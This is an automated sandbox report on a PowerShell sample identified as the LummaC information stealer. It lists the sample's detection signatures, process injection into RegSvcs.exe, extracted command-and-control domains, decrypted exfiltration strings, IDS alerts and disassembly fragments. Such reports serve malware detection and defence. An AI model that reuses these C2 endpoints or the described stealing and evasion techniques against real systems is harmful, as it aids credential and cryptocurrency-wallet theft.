Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
92.255.57_2.112.ps1

Overview

General Information

Sample name:92.255.57_2.112.ps1
Analysis ID:1590524
MD5:be4f493e0b615fa9df3216132c14f763
SHA1:dfda3628a9b8971a043fafab4c6ee95c8b4cd5cc
SHA256:229385fbe03dd8ab9489ee1f0f4a5916b89be800aa27b7d563b63080211235a9
Tags:bookingps1SPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 7408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_2.112.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7592 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 7600 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 7608 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • wermgr.exe (PID: 7616 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7408" "2496" "2432" "2500" "0" "0" "2468" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["curtainykeo.lat", "leggelatez.lat", "kickykiduz.lat", "savorraiykj.lat", "miniatureyu.lat", "finickypwk.lat", "bloodyswif.lat", "shoefeatthe.lat", "washyceehsu.lat"], "Build id": "atxOT1--traff12"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: RegSvcs.exe PID: 7608JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_2.112.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_2.112.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_2.112.ps1", ProcessId: 7408, ProcessName: powershell.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_2.112.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_2.112.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_2.112.ps1", ProcessId: 7408, ProcessName: powershell.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-14T08:27:12.602411+010020283713Unknown Traffic192.168.2.449730104.102.49.254443TCP
          2025-01-14T08:27:13.819855+010020283713Unknown Traffic192.168.2.449732188.114.96.3443TCP
          2025-01-14T08:27:14.743708+010020283713Unknown Traffic192.168.2.449736188.114.96.3443TCP
          2025-01-14T08:27:15.727636+010020283713Unknown Traffic192.168.2.449738188.114.96.3443TCP
          2025-01-14T08:27:17.659036+010020283713Unknown Traffic192.168.2.449740188.114.96.3443TCP
          2025-01-14T08:27:19.021812+010020283713Unknown Traffic192.168.2.449741188.114.96.3443TCP
          2025-01-14T08:27:20.289084+010020283713Unknown Traffic192.168.2.449743188.114.96.3443TCP
          2025-01-14T08:27:22.160237+010020283713Unknown Traffic192.168.2.449745188.114.96.3443TCP
          2025-01-14T08:27:24.845892+010020283713Unknown Traffic192.168.2.449748188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-14T08:27:14.261530+010020546531A Network Trojan was detected192.168.2.449732188.114.96.3443TCP
          2025-01-14T08:27:15.093246+010020546531A Network Trojan was detected192.168.2.449736188.114.96.3443TCP
          2025-01-14T08:27:25.345878+010020546531A Network Trojan was detected192.168.2.449748188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-14T08:27:14.261530+010020498361A Network Trojan was detected192.168.2.449732188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-14T08:27:15.093246+010020498121A Network Trojan was detected192.168.2.449736188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-14T08:27:11.805855+010020591891Domain Observed Used for C2 Detected192.168.2.4589841.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-14T08:27:11.927906+010020591911Domain Observed Used for C2 Detected192.168.2.4538551.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-14T08:27:11.877255+010020591991Domain Observed Used for C2 Detected192.168.2.4647201.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-14T08:27:11.830325+010020592011Domain Observed Used for C2 Detected192.168.2.4569011.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-14T08:27:11.848565+010020592031Domain Observed Used for C2 Detected192.168.2.4600481.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-14T08:27:11.893391+010020592071Domain Observed Used for C2 Detected192.168.2.4607151.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-14T08:27:11.905812+010020592091Domain Observed Used for C2 Detected192.168.2.4540931.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-14T08:27:11.817677+010020592111Domain Observed Used for C2 Detected192.168.2.4605491.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-14T08:27:18.480783+010020480941Malware Command and Control Activity Detected192.168.2.449740188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-14T08:27:13.109424+010028586661Domain Observed Used for C2 Detected192.168.2.449730104.102.49.254443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: kickykiduz.latAvira URL Cloud: Label: malware
          Source: miniatureyu.latAvira URL Cloud: Label: malware
          Source: bloodyswif.latAvira URL Cloud: Label: malware
          Source: curtainykeo.latAvira URL Cloud: Label: malware
          Source: washyceehsu.latAvira URL Cloud: Label: malware
          Source: savorraiykj.latAvira URL Cloud: Label: malware
          Source: finickypwk.latAvira URL Cloud: Label: malware
          Source: shoefeatthe.latAvira URL Cloud: Label: malware
          Source: leggelatez.latAvira URL Cloud: Label: malware
          Source: 4.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["curtainykeo.lat", "leggelatez.lat", "kickykiduz.lat", "savorraiykj.lat", "miniatureyu.lat", "finickypwk.lat", "bloodyswif.lat", "shoefeatthe.lat", "washyceehsu.lat"], "Build id": "atxOT1--traff12"}
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
          Source: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: finickypwk.lat
          Source: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: shoefeatthe.lat
          Source: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: savorraiykj.lat
          Source: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: kickykiduz.lat
          Source: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: miniatureyu.lat
          Source: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: leggelatez.lat
          Source: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: washyceehsu.lat
          Source: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bloodyswif.lat
          Source: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: curtainykeo.lat
          Source: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
          Source: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
          Source: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
          Source: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
          Source: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
          Source: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: atxOT1--traff12
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004182C0 CryptUnprotectData,4_2_004182C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00415D15 CryptUnprotectData,4_2_00415D15
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00418404 CryptUnprotectData,4_2_00418404
          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49748 version: TLS 1.2
          Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1913078842.0000026AD6A30000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1876839160.0000026ABE9A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1876839160.0000026ABF967000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+32DBB3B0h]4_2_00427A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx+05CAF138h]4_2_0040BA29
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push 00000000h4_2_0040CB44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0042D420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [eax], cx4_2_00423E44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov esi, edx4_2_00408740
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h4_2_00429871
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [ebx], cl4_2_0042E002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [ebx], cl4_2_0042E002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax4_2_0042A810
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp eax4_2_004288BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx esi, byte ptr [edx]4_2_00402940
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+0Eh]4_2_0040A910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esi+04h], eax4_2_004161DF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]4_2_004251E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push dword ptr [esp+28h]4_2_00426A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [edx]4_2_00438AF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [ebx], cx4_2_0041AA90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [esi], cx4_2_0041AA90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea eax, dword ptr [eax+eax*4]4_2_004082A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+2564CAB9h]4_2_0043EB00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ecx, eax4_2_00420B10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push eax4_2_00440310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov eax, dword ptr [00448B08h]4_2_004273A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+1Ch]4_2_004273A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea eax, dword ptr [esp+50h]4_2_004273A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]4_2_0041DC40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax]4_2_00417451
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]4_2_00407400
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]4_2_00407400
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7E3E42A0h4_2_0043C410
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then push esi4_2_0043C410
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h4_2_00415C25
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_0042B430
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then add ebp, edi4_2_00408CD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov word ptr [edi], cx4_2_00426D70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edx], cl4_2_0042DD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [edi+eax]4_2_0042E5C2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esi+04h], eax4_2_004165EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]4_2_00415590
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov edx, ecx4_2_004095A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [esi+04h], eax4_2_00415E42
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h4_2_00413E50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h4_2_0040DE72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+79h]4_2_00425E00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]4_2_00425E00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h4_2_0043EE10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al4_2_00408EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]4_2_0041DEB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]4_2_0041F710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-000000DEh]4_2_0041F710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh4_2_004427E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0042E7EB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 13884179h4_2_0040DFEA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0042F799
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov byte ptr [edi], al4_2_0042DFAF

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2059201 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) : 192.168.2.4:56901 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2059189 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) : 192.168.2.4:58984 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2059209 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) : 192.168.2.4:54093 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2059211 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) : 192.168.2.4:60549 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2059207 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) : 192.168.2.4:60715 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2059203 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) : 192.168.2.4:60048 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2059199 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) : 192.168.2.4:64720 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2059191 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) : 192.168.2.4:53855 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49736 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49730 -> 104.102.49.254:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49740 -> 188.114.96.3:443
          Source: Malware configuration extractorURLs: curtainykeo.lat
          Source: Malware configuration extractorURLs: leggelatez.lat
          Source: Malware configuration extractorURLs: kickykiduz.lat
          Source: Malware configuration extractorURLs: savorraiykj.lat
          Source: Malware configuration extractorURLs: miniatureyu.lat
          Source: Malware configuration extractorURLs: finickypwk.lat
          Source: Malware configuration extractorURLs: bloodyswif.lat
          Source: Malware configuration extractorURLs: shoefeatthe.lat
          Source: Malware configuration extractorURLs: washyceehsu.lat
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.102.49.254:443
          Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
